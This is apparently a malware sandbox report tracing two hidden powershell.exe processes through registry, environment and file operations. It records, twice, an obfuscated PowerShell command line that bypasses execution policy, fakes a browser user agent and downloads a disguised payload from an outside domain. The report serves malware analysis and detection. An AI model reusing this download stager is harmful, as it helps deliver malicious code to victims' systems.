File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn

Thread 0xccc

35

0

»

Category	Operation	Information	Success	Count	Logfile

Process #41: powershell.exe

298

0

»

Information	Value
ID	#41
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:01, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:24

OS Process Information

»

Information	Value
PID	0xc5c
Parent PID	0xc04 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x C60 0x C78 0x C88 0x C9C 0x CA4 0x CB4 0x CD4 0x CDC

Memory Dumps

»

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
powershell.exe	0x13FF20000	0x13FF96FFF	Relevant Image	-	64-bit	-	... Region Actions Download Dump
buffer	0x7FF00182000	0x7FF00182FFF	First Execution	-	64-bit	0x7FF00182020	... Region Actions Download Dump
buffer	0x7FF00033000	0x7FF00033FFF	First Execution	-	64-bit	0x7FF00033B38, 0x7FF00033638	... Region Actions Download Dump
buffer	0x7FF0010E000	0x7FF0010EFFF	First Execution	-	64-bit	0x7FF0010E820, 0x7FF0010E000	... Region Actions Download Dump
buffer	0x7FF00135000	0x7FF00135FFF	First Execution	-	64-bit	0x7FF0013507D	... Region Actions Download Dump
buffer	0x7FF00133000	0x7FF00133FFF	First Execution	-	64-bit	0x7FF00133A20, 0x7FF00133A7D	... Region Actions Download Dump
buffer	0x7FF00136000	0x7FF00136FFF	First Execution	-	64-bit	0x7FF0013607D	... Region Actions Download Dump
buffer	0x7FF00270000	0x7FF00270FFF	First Execution	-	64-bit	0x7FF00270130	... Region Actions Download Dump

Threads

Thread 0xc60

263

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn

Thread 0xcdc

35

0

»

Category	Operation	Information	Success	Count	Logfile

Process #42: powershell.exe

477

0

»

Information	Value
ID	#42
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:01, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:24

OS Process Information

»

Information	Value
PID	0xc64
Parent PID	0xb44 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x C68 0x C98 0x CB8 0x CC0 0x CD8 0x CE8 0x DD4

Threads

Thread 0xc68

430

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
System	Get Info	type = Hardware Information	1	Fn
